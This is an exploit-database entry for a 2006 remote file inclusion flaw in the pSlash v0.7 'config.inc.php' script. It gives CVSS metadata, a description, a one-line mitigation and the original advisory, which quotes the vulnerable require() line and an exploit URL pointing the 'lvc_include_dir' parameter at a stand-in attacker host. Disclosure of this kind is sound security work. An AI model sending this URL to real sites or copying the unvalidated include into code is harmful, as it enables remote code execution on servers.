header-logo
Suggest Exploit
vendor:
pSlash
by:
XORON
7.5
CVSS
HIGH
Remote Include Vulnerability
98
CWE
Product Name: pSlash
Affected Version From: pSlash v0.7
Affected Version To: pSlash v0.7
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

pSlash v0.7 (lvc_include_dir) Remote Include Vulnerability

A remote include vulnerability exists in pSlash v0.7, due to the use of an unvalidated user-supplied input in the 'lvc_include_dir' parameter of the 'config.inc.php' script. An attacker can exploit this vulnerability to include arbitrary remote files, allowing for the execution of arbitrary PHP code.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

############################################################

pSlash v0.7 (lvc_include_dir) Remote Include Vulnerability

############################################################

#Author: XORON

############################################################

#Class: Remote

############################################################

#cont@ct: x0r0n[at]hotmail[dot]com

############################################################

#Code:  require($lvc_include_dir.'db/db_mysql.inc.php');

############################################################

#Exploit:
http://www.site.com/[path]/modules/visitors2/include/config.inc.php?lvc_include_dir=http://evil_scripts?

############################################################

#Greetz: str0ke, Ironfist, Preddy, sakkkure

############################################################

# milw0rm.com [2006-08-23]